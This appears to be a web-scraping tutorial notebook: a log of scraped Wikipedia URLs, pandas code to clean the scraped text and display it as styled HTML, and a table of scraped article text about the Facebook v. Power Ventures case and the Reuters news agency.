https://en.wikipedia.org/wiki/Data_acquisition Scraped text and tables: https://en.wikipedia.org/wiki/Information_risk_management Scraped text and tables: https://en.wikipedia.org/wiki/Doi_(identifier) Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#DOM_parsing Scraped text and tables: https://en.wikipedia.org/wiki/Data_reduction Scraped text only: https://en.wikipedia.org/wiki/Special:SpecialPages Scraped text and tables: https://en.wikipedia.org/wiki/Ryanair Scraped text and tables: https://en.wikipedia.org/wiki/Revenue Scraped text and tables: https://en.wikipedia.org/wiki/File:Question_book-new.svg Scraped text and tables: https://en.wikipedia.org/wiki/Intrusion_detection_system Scraped text and tables: https://en.wikipedia.org/wiki/Security-focused_operating_system Scraped text and tables: https://en.wikipedia.org/wiki/Geolocation Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-13 Scraped text and tables: https://en.wikipedia.org/wiki/SQL_injection Scraped text and tables: https://en.wikipedia.org/wiki/Artificial_intelligence Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#European_Union Scraped text only: https://www.google.com/search?&q=%22Web+scraping%22&tbs=bkt:s&tbm=bks Scraped text and tables: 
https://en.wikipedia.org/wiki/Clickwrap Scraped text and tables: https://en.wikipedia.org/wiki/Computers Scraped text only: http://www.fxweek.com/fx-week/news/1539599/contributors-fret-about-reuters-plan-to-switch-from-monitor-network-to-idn Scraped text and tables: https://en.wikipedia.org/wiki/Extract,_load,_transform Scraped text and tables: https://en.wikipedia.org/wiki/ISSN_(identifier) Scraped text and tables: https://en.wikipedia.org/wiki/Special:RecentChangesLinked/Web_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Web_mining Scraped text only: https://medium.com/@finddatalab/can-you-still-perform-web-scraping-with-the-new-cnil-guidelines-bf3e20d0edc2 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=21 Scraped text and tables: http://www.searchenginehistory.com/ Scraped text and tables: https://en.wikipedia.org/wiki/EBay Scraped text and tables: https://ar.wikipedia.org/wiki/%D8%AA%D8%AC%D8%B1%D9%8A%D9%81_%D9%88%D9%8A%D8%A8 Non-HTML content type for https://web.archive.org/web/20071012005033/http://www.bvhd.dk/uploads/tx_mocarticles/S_-_og_Handelsrettens_afg_relse_i_Ofir-sagen.pdf: application/pdf Scraped text and tables: https://en.wikipedia.org/wiki/Human-computer_interaction Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-15 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=1 Scraped text and tables: https://en.wikipedia.org/wiki/Cybercrime Scraped text and tables: https://en.wikipedia.org/wiki/InfoWorld Scraped text and tables: https://es.wikipedia.org/wiki/Screen_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_note-5 Scraped text only: https://fi.wikipedia.org/wiki/Tiedonharavointi Scraped text and tables: https://en.wikipedia.org/wiki/Data_integrity Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-4 Scraped text and tables: https://en.wikipedia.org/wiki/Data_retention Scraped text and tables: https://en.wikipedia.org/wiki/Category:All_articles_containing_potentially_dated_statements Scraped text and tables: https://en.wikipedia.org/wiki/Programmers Scraped text only: https://en.wikipedia.org/wiki/Web_data_integration Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_note-8 Scraped text and tables: https://www.wikidata.org/wiki/Special:EntityPage/Q665452#sitelinks-wikipedia Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Text_pattern_matching Scraped text and tables: https://en.wikipedia.org/wiki/Web_page Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-29 Scraped text only: https://en.wikipedia.org/wiki/Help:Introduction Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=8 Scraped text and tables: https://en.wikipedia.org/wiki/Data_extraction Scraped text and tables: https://en.wikipedia.org/wiki/Data_storage Scraped text and tables: https://en.wikipedia.org/wiki/HiQ_Labs_v._LinkedIn Scraped text and tables: https://en.wikipedia.org/wiki/Antivirus_software Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#Technical_variants Scraped text and tables: https://en.wikipedia.org/wiki/Importer_(computing) Scraped text and tables: https://en.wikipedia.org/wiki/Information_warfare Scraped text and tables: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy Scraped text and tables: https://en.wikipedia.org/wiki/Automation Scraped text and 
tables: https://en.wikipedia.org/wiki/Automotive_security Non-HTML content type for http://www.webstartdesign.com.au/spam_business_practical_guide.pdf: application/pdf Scraped text and tables: https://en.wikipedia.org/wiki/Cyberwarfare Scraped text and tables: https://en.wikipedia.org/wiki/Object-oriented_programming Scraped text and tables: https://en.wikipedia.org/wiki/Main_Page Scraped text and tables: https://en.wikipedia.org/wiki/Feist_Publications,_Inc.,_v._Rural_Telephone_Service_Co. Scraped text and tables: https://en.wikipedia.org/wiki/Internet_Archive Failed to scrape https://api.semanticscholar.org/CorpusID:237719804: Status code 202 Scraped text and tables: https://en.wikipedia.org/wiki/Special:BookSources/978-1-5386-8260-9 Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:File_upload_wizard Scraped text and tables: https://en.wikipedia.org/wiki/S2CID_(identifier) Scraped text only: https://www.google.com/search?tbs=bks:1&q=%22Web+scraping%22+-wikipedia Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Techniques Scraped text and tables: https://en.wikipedia.org/wiki/Display_device Failed to scrape http://groups.csail.mit.edu/uid/projects/sikuli/sikuli-uist2009.pdf: Status code 500 Scraped text and tables: https://en.wikipedia.org/wiki/Secure_by_design Scraped text and tables: https://en.wikipedia.org/wiki/Botnet Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:DownloadAsPdf&page=Web_scraping&action=show-download-screen Scraped text only: https://donate.wikimedia.org/wiki/Special:FundraiserRedirector?utm_source=donate&utm_medium=sidebar&utm_campaign=C13_en.wikipedia.org&uselang=en Scraped text and tables: https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Cookie_statement Scraped text and tables: https://en.wikipedia.org/wiki/Computer_virus Scraped text and tables: https://en.wikipedia.org/wiki/Category:Articles_with_short_description Scraped text and tables: https://en.wikipedia.org/wiki/File:CIAJMK1209-en.svg Scraped text and tables: https://en.wikipedia.org/wiki/Category:Articles_with_limited_geographic_scope_from_October_2015 Scraped text only: https://en.wikipedia.org/wiki/End-user_(computer_science) Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:CreateAccount&returnto=Web+scraping Scraped text and tables: https://en.wikipedia.org/wiki/Data_recovery Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_ref-22 Scraped text and tables: https://en.wikipedia.org/wiki/Knowledge_extraction Scraped text only: https://stats.wikimedia.org/#/en.wikipedia.org Scraped text and tables: https://en.wikipedia.org/wiki/Help:Maintenance_template_removal Scraped text and tables: https://en.wikipedia.org/wiki/Data_corruption Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:CiteThisPage&page=Web_scraping&id=1240545829&wpFormIdentifier=titleform Scraped text only: https://www.mediawiki.org Scraped text and tables: https://en.wikipedia.org/wiki/Robots_exclusion_standard Scraped text and tables: https://en.wikipedia.org/wiki/Python_(programming_language) Scraped text and tables: https://en.wikipedia.org/wiki/Multi-factor_authentication Scraped text and tables: https://en.wikipedia.org/wiki/Electromagnetic_warfare Scraped text only: https://en.wikipedia.org/wiki/Terms_of_service Scraped text and tables: https://ko.wikipedia.org/wiki/%EB%8D%B0%EC%9D%B4%ED%84%B0_%EC%8A%A4%ED%81%AC%EB%A0%88%EC%9D%B4%ED%95%91 Scraped text and tables: 
https://en.wikipedia.org/wiki/Web_scraping#cite_ref-28 Scraped text only: http://www.xconomy.com/san-francisco/2012/07/25/diffbot-is-using-computer-vision-to-reinvent-the-semantic-web/ Scraped text and tables: https://en.wikipedia.org/wiki/Firewall_(computing) Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-21 Scraped text only: https://it.wikipedia.org/wiki/Web_scraping Scraped text only: https://en.wikipedia.org/wiki/Category:Data_processing Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-26 Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#References Scraped text and tables: https://en.wikipedia.org/wiki/Special:RecentChanges Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Web_Scraping_Platforms Scraped text and tables: https://hdl.handle.net/1822%2F32460 Scraped text and tables: https://en.wikipedia.org/wiki/Template:Information_security Scraped text only: https://wikimediafoundation.org/ Scraped text and tables: https://en.wikipedia.org/wiki/Information_privacy Scraped text only: https://en.wikipedia.org/w/index.php?title=Special:QrCode&url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FWeb_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Category:CS1_Danish-language_sources_(da) Scraped text and tables: https://en.wikipedia.org/wiki/Blog_scraping Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#Human_copy-and-paste Scraped text only: https://is.wikipedia.org/wiki/Vefs%C3%B6fnun Scraped text and tables: https://www.wikidata.org/wiki/Special:EntityPage/Q521850#sitelinks-wikipedia Scraped text and tables: https://en.wikipedia.org/wiki/Application_programming_interface Scraped text only: https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=4 Scraped text and tables: https://en.wikipedia.org/wiki/Data_scraping#cite_note-10 Scraped text only: https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=11 Scraped text and tables: https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol Scraped text and tables: https://en.wikipedia.org/wiki/Wikipedia:About Scraped text and tables: https://en.wikipedia.org/wiki/Authorization Scraped text and tables: https://en.wikipedia.org/wiki/Web_scraping#cite_note-22 Scraped text and tables: https://en.wikipedia.org/wiki/World_Wide_Web
final_data['scraped_text'] = final_data['scraped_text'].str.strip()
final_data = final_data[final_data['scraped_text'] != '']
# Reset the index so that it correctly reflects the row positions after removing the empty rows.
final_data.reset_index(drop=True, inplace=True)
# Save the object containing the scraped data so that you do not need to re-scrape the same data in the future.
import pickle
# pickle.dump(final_data, open('final_data.pkl', 'wb'))
# final_data = pickle.load(open('final_data.pkl', 'rb'))
import pandas as pd
pd.set_option('display.max_rows', None) # Print all rows. If this line is not used, only the first and last 5 rows will be shown
pd.set_option('display.max_colwidth', None) # Prevent column width truncation
print(final_data[["original_url", "scraped_url", "scraped_text"]]) # Wrapping the output in print() hides any escape characters in the text
IOPub data rate exceeded. The notebook server will temporarily stop sending output to the client in order to avoid crashing it. To change this limit, set the config variable `--NotebookApp.iopub_data_rate_limit`. Current values: NotebookApp.iopub_data_rate_limit=1000000.0 (bytes/sec) NotebookApp.rate_limit_window=3.0 (secs)
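If you prefer to keep using print(), one option is to raise the limit named in the message when starting the notebook server; the exact value below is only an example.
# Optional (run from a terminal, not inside this notebook): raise the IOPub output limit, e.g.
#   jupyter notebook --NotebookApp.iopub_data_rate_limit=1.0e10
# or set c.NotebookApp.iopub_data_rate_limit = 1.0e10 in jupyter_notebook_config.py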
A more convenient alternative is to render the DataFrame as scrollable HTML. Wrapping each text cell in <pre> tags escapes special characters such as $ signs that could otherwise alter the font styling in the display.
from IPython.display import display, HTML
import html
import pandas as pd
# Print all rows. If this line is not used, only the first and last 5 rows will be shown
pd.set_option('display.max_rows', None)
# Set the maximum column width to None to prevent truncation
pd.set_option('display.max_colwidth', None)
from html import unescape
# Explanation of the wrap_in_pre() function:
# 1) I use the unescape() function from the html module in wrap_in_pre() to convert any previously escaped HTML
#    entities (e.g., &amp;, &quot;, &#x27;) back to their literal characters, so the text is not double-escaped
#    when html.escape() is applied below.
# 2) The <pre> tags ensure all text within them is treated as plain text by the browser. This includes special
#    characters like dollar signs, preventing them from being interpreted in ways that could alter their
#    appearance or introduce unwanted formatting.
# Function to wrap text in <pre> tags and escape it
def wrap_in_pre(text):
# Unescape any previously escaped HTML entities
text = unescape(text)
# Check if the text is already wrapped in <pre> tags
if text.startswith('<pre>') and text.endswith('</pre>'):
return text # If already wrapped, return as is
return f"<pre>{html.escape(text)}</pre>" # Wrap in <pre> tags and escape
# Apply the function to your DataFrame column
final_data['scraped_text'] = final_data['scraped_text'].apply(wrap_in_pre)
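As a quick optional check of what wrap_in_pre() produces, you can pass it a made-up sample string (illustrative only, not taken from the scraped data):
print(wrap_in_pre('Revenue grew 5% to $100 and "doubled" expectations'))
# -> <pre>Revenue grew 5% to $100 and &quot;doubled&quot; expectations</pre>
# The double quotes become HTML entities, while the % and $ characters pass through unchanged.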
# Render the DataFrame with the new wrapped text
styled_df = final_data[['original_url', 'scraped_url', 'scraped_text']].style.set_properties(**{
'text-align': 'left',
'vertical-align': 'top',
'white-space': 'normal',
'font-family': 'Georgia, serif',
'font-size': '16px',
'line-height': '1.6',
'font-weight': 'normal',
'font-style': 'normal',
'word-break': 'normal'
}).set_table_styles([
{'selector': 'th, td',
'props': [('text-align', 'left'), ('vertical-align', 'top'), ('white-space', 'normal'), ('word-wrap', 'break-word')]},
{'selector': 'th:nth-child(1), td:nth-child(1)', # Apply styles to the first column
'props': [('max-width', '120px')]},
{'selector': 'th:nth-child(2), td:nth-child(2)', # Apply styles to the second column
'props': [('max-width', '140px')]},
{'selector': 'th:nth-child(3), td:nth-child(3)', # Apply styles to the third column
'props': [('max-width', '200px')]}
])
from html import unescape
# Now, strip the inserted <pre> and </pre> tags and unescape HTML entities in case you later need to work with the data
# in its original form. This undoes what wrap_in_pre() did above. This is important because wrap_in_pre() introduced special
# formatting for display purposes.
def strip_pre_tags_and_unescape(text):
# Remove the <pre> and </pre> tags if they exist
if text.startswith('<pre>') and text.endswith('</pre>'):
text = text[5:-6] # Remove the <pre> and </pre> tags
# Unescape any HTML entities in the text
text = unescape(text)
return text
# Apply the function to your DataFrame column
final_data['scraped_text'] = final_data['scraped_text'].apply(strip_pre_tags_and_unescape)
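Optionally, a small round-trip check on a made-up sample string confirms that strip_pre_tags_and_unescape() undoes wrap_in_pre():
sample = 'Short- and long-term goals grew 5% to $100'
assert strip_pre_tags_and_unescape(wrap_in_pre(sample)) == sample  # wrapping then stripping returns the original text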
# Modify the div as follows
html_rendered_dataframe = f"""
<div style='max-height: 400px; overflow-x: auto; overflow-y: auto; border: 1px solid #ccc; padding: 10px; font-family: Georgia, serif; font-size: 16px;'>
<style>
table {{
display: block;
overflow-x: auto;
max-width: 100%;
white-space: nowrap;
}}
th, td {{
font-style: normal !important;
font-weight: normal !important;
font-family: Georgia, serif !important;
font-size: 16px !important;
}}
</style>
{styled_df.to_html(escape=False)}
</div>
"""
# Display the scrollable styled DataFrame
display(HTML(html_rendered_dataframe))
original_url | scraped_url | scraped_text | |
---|---|---|---|
0 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Facebook,_Inc._v._Power_Ventures,_Inc. | Facebook, Inc. v. Power Ventures, Inc. is a lawsuit brought by Facebook in the United States District Court for the Northern District of California alleging that Power Ventures Inc., a third-party platform, collected user information from Facebook and displayed it on their own website. Facebook claimed violations of the CAN-SPAM Act, the Computer Fraud and Abuse Act ("CFAA"), and the California Comprehensive Computer Data Access and Fraud Act. 1 According to Facebook, Power Ventures Inc. made copies of Facebook's website during the process of extracting user information. Facebook argued that this process causes both direct and indirect copyright infringement. In addition, Facebook alleged this process constitutes a violation of the Digital Millennium Copyright Act ("DMCA"). Finally, Facebook also asserted claims of both state and federal trademark infringement, as well as a claim under California's Unfair Competition Law ("UCL"). Power Ventures previously operated the domain power.com and used it to create a website that enabled its users to aggregate data about themselves that is otherwise spread across various social networking sites and messaging services, including LinkedIn, Twitter, Myspace, and AOL or Yahoo instant messaging. This aggregation method is embodied in its motto: "all your friends in just one place". 2 Power Ventures wanted to provide a single site for its customers to see all of their friends, to view their status updates or profile pages, and to send messages to multiple friends on multiple sites. 3 The litigation focuses on Power Ventures alleged "scraping" of content for and from users on Facebook into Power Ventures interface. Facebook sued claiming violations of copyright, DMCA, CAN-SPAM, and CFAA. 4 5 Power Ventures and Facebook tried unsuccessfully to work out a deal that allowed Power Ventures to access Facebook's site, through Facebook Connect. In late December 2008, Power Ventures informed Facebook that it would continue to operate without using Facebook Connect. Power Ventures allegedly continued to "scrape" Facebook's website, despite technological security measures to block such access. 4 Facebook sued Power Ventures Inc. in the Northern District of California. The court's ruling addressed a motion to dismiss the copyright, DMCA, trademark, and UCL claims. When a court considers a motion to dismiss, it must take the allegations in the Plaintiff's complaint as true and construe the Complaint in a manner that is favorable to the Plaintiff. Thus, for a motion to dismiss to succeed, the complaint must lack either a cognizable legal theory or sufficient facts to support the legal theory. 6 To state a claim for copyright infringement, a plaintiff need only allege The First Amended Complaint ("FAC") alleged that Power Ventures accessed Facebook's website and made unauthorized "cache" copies of it or created derivative works derived from the Facebook website. However, Power Ventures contended that Facebook's copyright allegations are deficient because it is unclear which portions of Facebook's website are alleged to have been copied. Facebook argued that it need not define the exact contours of the protected material because copyright claims do not require particularized allegations. 
Since Facebook owns the copyright to any page within its system (including the material located on those pages besides user content, such as graphics, video and sound files), Power Ventures only has to access and copy one page to commit copyright infringement. 4 Facebook conceded that it did not have any proprietary rights in its users' information. Power Ventures users, who own the rights to the information sought, have expressly given them permission to gather this information. 4 5 Judge Fogel reasoned that MAI Systems Corp. v. Peak Computer, Inc. and Ticketmaster LLC v. RMG Techs. Inc. indicated that the scraping of a webpage inherently involves the copying of that webpage into a computer's memory in order to extract the underlying information contained therein. Even though this "copying" is ephemeral and momentary, that it is enough to constitute a "copy" under 106 of the Copyright Act and therefore infringement. 7 Since Facebook's Terms of Service prohibit scraping (and thus, Facebook has not given any license to third parties or users to do so), the copying happens without permission. 5 In the MAI case, the Court granted summary judgment in favor of MAI on its claims of copyright infringement and issued a permanent injunction against Peak. The alleged copyright violations included: In this particular case, the Court held that Ticketmaster LLC ("Ticketmaster") was likely to prevail on claims of direct and contributory copyright infringement as a result of defendant RMG Technologies Inc. ("RMG") distribution of a software application that permitted its clients to circumvent Ticketmaster.com's CAPTCHA access controls, and use Ticketmaster's copyrighted website in a manner that violated the site's Terms of Use. The Court held that RMG was likely to be found guilty of direct copyright infringement because when RMG viewed the site to create and test its product, it made unauthorized copies of Ticketmaster's site in its computer's RAM. 9 In the instant case, the Court followed Ticketmaster to determine that Power Ventures' 'scraping' made an actionable "cache" copy of a Facebook profile page each time it accessed a user's profile page. 4 The elements necessary to state a claim under the DMCA are Power Ventures argued that Facebook's DMCA claim was insufficient using the same arguments listed above. They also argued that the unauthorized use requirement was not met because the users are controlling the access (via Power Ventures site) to their own content on the Facebook website. However, the Terms of Use negate this argument because users are barred from using automated programs to access the Facebook website. While users may have the copyright rights in their own content, Facebook placed conditions on that access. After Power Ventures informed Facebook that it intended to continue their service without using Facebook Connect, Facebook implemented specific technical measures to block Power Ventures' access. Power Ventures then attempted to circumvent those technological measures. As all of the elements of a DMCA claim had been correctly pleaded and supported in the FAC, the motion to dismiss the DMCA claim was denied. 4 The Lanham Act imposes liability upon any person who Facebook stated that they were the registered owner of the FACEBOOK mark since 2004. Furthermore, they alleged that Power Ventures used the mark in connection with Power Ventures business. Facebook never authorized or consented to Power Ventures' use of the mark. 
Facebook also stated that Power Ventures' unauthorized use of the mark was likely to "confuse recipients and lead to the false impression that Facebook is affiliated with, endorses, or sponsors" Power Ventures. Power Ventures countered that Facebook was required to provide concise information in the Complaint with respect to the trademark infringement allegations, including information about each instance of such use. However, since particularized pleading is not required for trademark infringement claims, Facebook's allegations were sufficient to survive Power Ventures' motion to dismiss the trademark infringement claim. 4 To state a claim of trademark infringement under California common law, a plaintiff need only allege For the same reasons listed above, the Court also denied Power Ventures' motion to dismiss the state trademark claim. California's UCL jurisprudence had previously found Lanham Act claims to be substantially congruent to UCL claims. However, it was unclear as to whether Facebook was relying on it trade dress claims or if it also intended to incorporate other portions of the FAC, such as those dealing with the CAN-SPAM and CFAA claims. In order to promote an efficient docket, the Court granted Power Ventures' motion for a more definite statement. 4 On February 18, 2011 11 the judge granted the parties' stipulation to dismiss Facebook's DMCA claim, copyright and trademark infringement claims, and claims for violations of California Business and Professions Code Section 17200. Only three claims remained for the final order - the violation of the CAN-SPAM Act, violation of the CFAA and California Penal Code. The district court then granted summary judgment to Facebook on all three of the remaining Facebook claims. The district court awarded statutory damages of $3,031,350, compensatory damages, and permanent injunctive relief, and it held that Vachani 1064 1064 was personally liable for Power's actions. A magistrate judge ordered Power to pay $39,796.73 in costs and fees for a renewed Federal Civil Procedure Rule 30(b)(6) deposition. Power filed a motion for reconsideration, which the district court denied. Defendants timely appeal both the judgment and the discovery sanctions. Argued and Submitted December 9, 2015 San Francisco, California. Filed July 12, 2016 and Amended December 9, 2016. The appeals court affirmed the district court's holding that Vachani was personally liable for Power's actions. 12 Vachani was the central figure in Power's promotional scheme. First, Vachani admitted that, during the promotion, he controlled and directed Power's actions. Second, Vachani admitted that the promotion was his idea. It is undisputed, therefore, that Vachani was the guiding spirit and central figure in Power's challenged actions. Accordingly, we affirm the district court's holding on Vachani's personal liability for Power's actions. The court also affirmed discovery sanctions imposed against Power for non-compliance during a Rule 30(b)(6) deposition. Defendants failed to object to discovery sanctions in the district court. Failure to object forfeits Defendants' right to raise the issue on appeal. On April 24, 2017, Defendant Steven Vachani ("Vachani") filed a motion to stay all proceedings in the case pending resolution of his petition for certiorari in the United States Supreme Court. 
However, the Ninth Circuit has held that "once a federal circuit court issues a decision, the district courts within that circuit are bound to follow it and have no authority to await a ruling by the Supreme Court before applying the circuit court's decision as binding authority. 13 On May 2, 2017, the United States District Court, N.D. California, San Jose Division issued its final judgement ruled that, having considered the briefing of the parties, the record in the case, and the relevant law, the Court found that Facebook was only entitled to the reduced sum of $79,640.50 in compensatory damages and a permanent injunction. The Court also ordered Defendants to pay the $39,796.73 discovery sanction. 14 |
1 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Reuters | Reuters ( r t rz ROY-terz) is a news agency owned by Thomson Reuters. 1 2 It employs around 2,500 journalists and 600 photojournalists in about 200 locations worldwide writing in 16 languages. 3 Reuters is one of the largest and most trusted news agencies in the world. 4 5 6 The agency was established in London in 1851 by the German-born Paul Reuter. It was acquired by the Thomson Corporation of Canada in 2008 and now makes up the news media division of Thomson Reuters. 5 Paul Reuter worked at a book-publishing firm in Berlin and was involved in distributing radical pamphlets at the beginning of the Revolutions of 1848. These publications brought much attention to Reuter, who in 1850 developed a prototype news service in Aachen using homing pigeons and electric telegraphy from 1851 on, in order to transmit messages between Brussels and Aachen, 7 in what today is Aachen's Reuters House. Reuter moved to London in 1851 and established a news wire agency at the London Royal Exchange. Headquartered in London, Reuter's company initially covered commercial news, serving banks, brokerage houses, and business firms. 8 The first newspaper client to subscribe was the London Morning Advertiser in 1858, and more began to subscribe soon after. 8 9 According to the Encyclop dia Britannica: "the value of Reuters to newspapers lay not only in the financial news it provided but in its ability to be the first to report on stories of international importance. 8 It was the first to report Abraham Lincoln's assassination in Europe, for instance, in 1865. 8 10 In 1865, Reuter incorporated his private business, under the name Reuter's Telegram Company Limited; Reuter was appointed managing director of the company. 11 In 1870 the press agencies French Havas (founded in 1835), British Reuter's (founded in 1851) and German Wolff (founded in 1849) signed an agreement (known as the Ring Combination) that set 'reserved territories' for the three agencies. Each agency made its own separate contracts with national agencies or other subscribers within its territory. In practice, Reuters, who came up with the idea, tended to dominate the Ring Combination. Its influence was greatest because its reserved territories were larger or of greater news importance than most others. It also had more staff and stringers throughout the world and thus contributed more original news to the pool. British control of cable lines made London itself an unrivalled centre for world news, further enhanced by Britain's wide-ranging commercial, financial and imperial activities. 12 In 1872, Reuter's expanded into the Far East, followed by South America in 1874. Both expansions were made possible by advances in overland telegraphs and undersea cables. 10 In 1878, Reuter retired as managing director, and was succeeded by his eldest son, Herbert de Reuter. 11 In 1883, Reuter's began transmitting messages electrically to London newspapers. 10 Reuter's son Herbert de Reuter continued as general manager until his death by suicide in 1915. The company returned to private ownership in 1916, when all shares were purchased by Roderick Jones and Mark Napier; they renamed the company "Reuters Limited", dropping the apostrophe. 11 In 1919, a number of Reuters reports falsely described the anti-colonial March 1st Movement protests in Korea as violent Bolshevik uprisings. 
South Korean researchers found that a number of these reports were cited in a number of international newspapers and possibly negatively influenced international opinion on Korea. 13 In 1923, Reuters began using radio to transmit news internationally, a pioneering act. 10 In 1925, the Press Association (PA) of Great Britain acquired a majority interest in Reuters, and full ownership some years later. 8 During the world wars, The Guardian reported that Reuters: "came under pressure from the British government to serve national interests. In 1941, Reuters deflected the pressure by restructuring itself as a private company. 10 In 1941, the PA sold half of Reuters to the Newspaper Proprietors' Association, and co-ownership was expanded in 1947 to associations that represented daily newspapers in New Zealand and Australia. 8 The new owners formed the Reuters Trust. The Reuters Trust Principles were put in place to maintain the company's independence. 14 At that point, Reuters had become "one of the world's major news agencies, supplying both text and images to newspapers, other news agencies, and radio and television broadcasters. 8 Also at that point, it directly or through national news agencies provided service "to most countries, reaching virtually all the world's leading newspapers and many thousands of smaller ones", according to Britannica. 8 In 1961, Reuters scooped news of the erection of the Berlin Wall. 15 Reuters was one of the first news agencies to transmit financial data over oceans via computers in the 1960s. 8 In 1973, Reuters "began making computer-terminal displays of foreign-exchange rates available to clients. 8 In 1981, Reuters began supporting electronic transactions on its computer network and afterwards developed a number of electronic brokerage and trading services. 8 Reuters was floated as a public company in 1984, 15 when Reuters Trust was listed on the stock exchanges 10 such as the London Stock Exchange (LSE) and NASDAQ. 8 Reuters later published the first story of the Berlin Wall being breached in 1989. 15 Reuters was the dominant news service on the Internet in the 1990s. It earned this position by developing a partnership with ClariNet and Pointcast, two early Internet-based news providers. 16 Reuters' share price grew during the dotcom boom, then fell after the banking troubles in 2001. 10 In 2002, Britannica wrote that most news throughout the world came from three major agencies: the Associated Press, Reuters, and Agence France-Presse. 4 Until 2008, the Reuters news agency formed part of an independent company, Reuters Group plc. Reuters was acquired by Thomson Corporation in Canada in 2008, forming Thomson Reuters. 8 In 2009, Thomson Reuters withdrew from the LSE and the NASDAQ, instead listing its shares on the Toronto Stock Exchange (TSX) and the New York Stock Exchange (NYSE). 8 The last surviving member of the Reuters family founders, Marguerite, Baroness de Reuter, died at age 96 on 25 January 2009. 17 The parent company Thomson Reuters is headquartered in Toronto, and provides financial information to clients while also maintaining its traditional news-agency business. 8 In 2012, Thomson Reuters appointed Jim Smith as CEO. 14 In July 2016, Thomson Reuters agreed to sell its intellectual property and science operation for $3.55 billion to private equity firms. 18 In October 2016, Thomson Reuters announced expansions and relocations to Toronto. 18 As part of cuts and restructuring, in November 2016, Thomson Reuters Corp. 
eliminated 2,000 jobs worldwide out of its estimated 50,000 employees. 18 On 15 March 2020, Steve Hasker was appointed president and CEO. 19 In April 2021, Reuters announced that its website would go behind a paywall, following rivals who have done the same. 20 21 In March 2024, Gannett, the largest newspaper publisher in the United States, signed an agreement with Reuters to use the wire service's global content after cancelling its contract with the Associated Press. 22 In 2024, Reuters staff won the Pulitzer Prize for National Reporting for their work on Elon Musk and misconduct at his businesses, including SpaceX, Tesla, and Neuralink, as well as the Pulitzer Prize for Breaking News Photography for coverage of the Israel Hamas war. 23 Reuters employs some 2,500 journalists and 600 photojournalists 24 in about 200 locations worldwide. 25 26 5 Reuters journalists use the Standards and Values as a guide for fair presentation and disclosure of relevant interests, to "maintain the values of integrity and freedom upon which their reputation for reliability, accuracy, speed and exclusivity relies". 27 28 In May 2000, Kurt Schork, an American reporter, was killed in an ambush while on assignment in Sierra Leone. In April and August 2003, news cameramen Taras Protsyuk and Mazen Dana were killed in separate incidents by U.S. troops in Iraq. In July 2007, Namir Noor-Eldeen and Saeed Chmagh were killed when they were struck by fire from a U.S. military Apache helicopter in Baghdad. 29 30 During 2004, cameramen Adlan Khasanov was killed by Chechen separatists, and Dhia Najim was killed in Iraq. In April 2008, cameraman Fadel Shana was killed in the Gaza Strip after being hit by an Israeli tank. 31 32 While covering China's Cultural Revolution in Peking in the late 1960s for Reuters, journalist Anthony Grey was detained by the Chinese government in response to the jailing of several Chinese journalists by the colonial British government of Hong Kong. 33 He was released after being imprisoned for 27 months from 1967 to 1969 and was awarded an OBE by the British Government. After his release, he went on to become a best-selling historical novelist. 34 In May 2016, the Ukrainian website Myrotvorets published the names and personal data of 4,508 journalists, including Reuters reporters, and other media staff from all over the world, who were accredited by the self-proclaimed authorities in the separatist-controlled regions of eastern Ukraine. 35 In 2018, two Reuters journalists were convicted in Myanmar of obtaining state secrets while investigating a massacre in a Rohingya village. 36 The arrest and convictions were widely condemned as an attack on press freedom. The journalists, Wa Lone and Kyaw Soe Oo, received several awards, including the Foreign Press Association Media Award and the Pulitzer Prize for International Reporting, and were named as part of the Time Person of the Year for 2018 along with other persecuted journalists. 37 38 39 After 511 days in prison, Wa Lone and Kyaw Soe Oo were freed on 7 March 2019 after receiving a presidential pardon. 40 In February 2023, a team of Reuters journalists won the Selden Ring Award for their investigation that exposed human-rights abuses by the Nigerian military. 41 In 1977, Rolling Stone and The New York Times said that according to information from CIA officials, Reuters cooperated with the CIA. 
